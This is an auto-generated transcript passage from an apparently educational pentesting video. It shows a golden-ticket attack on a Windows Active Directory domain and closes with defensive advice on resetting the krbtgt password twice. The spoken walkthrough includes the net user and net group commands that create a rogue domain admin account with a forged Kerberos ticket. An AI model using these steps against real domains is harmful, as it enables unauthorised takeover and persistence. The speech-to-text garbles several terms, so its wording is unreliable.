group policy Creator owner we are schema adminster Enterprise admins and this denied rodc password replication group right High mandatory level we have access to everything as the user Michael so Michael is still not really a part of the domain mean admin script right if we check active directory now and go into the into the domain admins we're not going to see Michael there but we have been granted this access by the KDC because we fooled it with a valid TGT signed by the very Kerberos or krbt account in the domain so we're just fooling the entire system he could do anything he wanted now right yes so to demonstrate this let's have a look at we are at a domain controller hostname right so if I do net user on a domain controller we can see the users in active directory as well they are not local users but those are the users for the domain we can see Michael Jeff Kirby tdt Mary guest and so on and the command completed with one or more errors we don't really care about that so are we really domain admin we can try to find out right let's run the same we did with escalation we did earlier net user Mighty let's do a more complex password we can at least do a password one two three with a big p now right one three exclamation mark well one one two three like this and we do the slash add this is only going to add the user Mighty to the server running or serving active directory we don't really want that we want to add them to The Domain right net user Mighty password onto three add domain the command completed successfully so we now if we do net user we have might user here if I do net user Mighty I might try to to add the domain Flagger to see if it's better yeah so net user Mighty domain we can see that we are now a domain user but we are just a part of the domain users that's kind of boring right if I do net group domain admins Mighty add domain as our fake user here using our golden ticket okay that was not found I have a typo here let's do that again right so I'm going to go ahead and do net group domain admins we need to remember that Esther we're going to try to add Mighty because we are now a user in the domain add slash domain and this is never ever gonna work if if you're not a domain admin right the command completed successfully if I do net user Mighty slash domain here we are a part of the domain admins and that's that's pretty cool I have to say and we can now for example let's disconnect from the domain controller as well and just exit everything pick a log out from client to one and we can try to log in with a with a new user here my day password onto three in this case we log into the corp.com domain this is going a little bit quick now but but it's it's just so game or for this domain so I mean we can we can play around for ages here because it takes a little bit of time because it needs to to create the profile here in Windows but we have a welcome and hopefully we will see a desktop really soon as well so with this we also I mean obviously with domain admin we escalator our privileges on clients and and everything but you can go ahead now start CMD we don't even need to start with this admin because we we are essentially domain admin here net user Mighty slash domain part of the domain admits and all I can do everything I want with the domain or with MIT use right but I I didn't necessarily need to add my tier because I am Michael I have a ticket that is valid for 4 000 years right but this was just to to kind of show uh the power and that is it was not all just fake right it was an actual domain admin where we had that's fantastic really that's great I mean thanks so much for the demo you know it's it's it's one thing to read this it's one thing to like you know just talk about it but it's great to see the demos I really appreciate you putting the demo together because I know these demos can be really hard to do yeah this one was a lot of talking so um my voice is gonna be probably no but uniform great demo great demo so just to summarize we started with a user where we had credentials but it was just a very basic user and we ended with you having total control of the domain yeah so if you want to you know go further on our attack path there Jeff PS creds for example log in as domain admin take over DC and then golden ticket for example golden ticket eternal power [Music] that's basically right I mean of course there are ways to to invalidate a golden ticket as well but and this is actually something I wanted to mention so I have been on a lot of penetration tests and one of the things I really check is okay how long ago is it that the krb TGT password was changed right and I have seen this up to 12 15 years wow like the account is from when the domain was created and yes of course you might have upgraded from Windows 2000 to 2008 to 2012 2022 and so on but the Carib tdt password hash Remains the Same unless you actually you know reset the password right the only way to actually really invalidate a ticket like this is to reset the krb TGT password as twice you need to do it twice one is not enough and it's really difficult to just get away from this you're best offer if you just don't let an attacker get so far so it can get control over your domain controller right that's really the best thing to do follow best practices use strong password policies patch your software just don't that attacker scene in the first place so the easier said than done very easy to say that yeah definitely yeah and just for the systems out there I don't recommend it to just rush to your computer and reset this password now you want to do some research on how to actually do that first there are some best practices for it but for Kerberos there or the care be TTT password as they're they're Issa backwards compatibility right because if you reset the password on the krb krbt DT account and that hash immediately gets changed then existing tickets in your domains can be invalidated they're not going to work anymore people won't be able to do this and that Services might fail Etc but there is a backup for that so the previous ntlm hash that you used is still going to be stored and used as this kind of backup right but if you reset it twice then it's kind of okay your domain might not be functioning too well so you want to plan this out a little bit and I believe Microsoft has a script for this that you you should probably follow to invalid it and I strongly recommend having the krb TGT account involved in a password routine where you change it every so well often right now I mean it's I think the the point about all of this is you it's that whole thing why do we do this to show vulnerabilities and then to come up with best practices yep yep I mean you may not all pen testers necessarily know how to patch everything and that kind of stuff right but we we come with at least recommendations and this is for this domain uh this is the the best recommendation I can reset that password I would just reset it twice right away because in the meantime if you raise it once uh the attacker can still go ahead and refresh their golden ticket right and this is one of the reasons I mean in newspapers here in Scandinavia at least I often read about the tax and we often see that okay the attackers has been in our system for for so long right I mean we don't have control and that kind of stuff and there might be several reasons for that I mean they might have a very persistent vulnerability that they are exploiting over and over and over again like it's just an open door you can you can come and go as it like but if you at some point get access to this account as I mentioned you don't even need to be logged into the domain you just need to be able to communicate with the DC and you have the main admin or in fact you have the Privileges you want in the domain you can decide yourself right it's scary and again as a pen tester I don't recommend doing this but you know malicious people are doing it but I mean thanks so much again for showing the demo and for everyone who's watching put in the comments below did you enjoy this hopefully we can get Remy and others from an offsec team back to show more stuff like this because it's fantastic to see these demos I think but please put in the comments below Remy has just wanted to say thanks once again thanks for spending so much time building this and demonstrating it no problem I enjoyed it I like creating demos and share the knowledge out there so that's perfect

Info

Channel: David Bombal

Views: 231,651

Rating: undefined out of 5

Keywords: windows, windows hack, microsoft, microsoft windows, domain hack, oscp, pen-200, pen200, pen 200, offsec, offensive security, pentester, hacker, hack, hacking, pentesting, web hacking, free web hacking, owasp, owasp top 10, http, https, website, web hacking pro tips, ssl, ca, cookie, xss, cross site scripting, kali linux, portswigger, jscript, bug bounty, kali, ethical hacker, penetration testing, penetration tester

Id: f8jGhLwCa28

Channel Id: undefined

Length: 109min 44sec (6584 seconds)

Published: Fri Jun 02 2023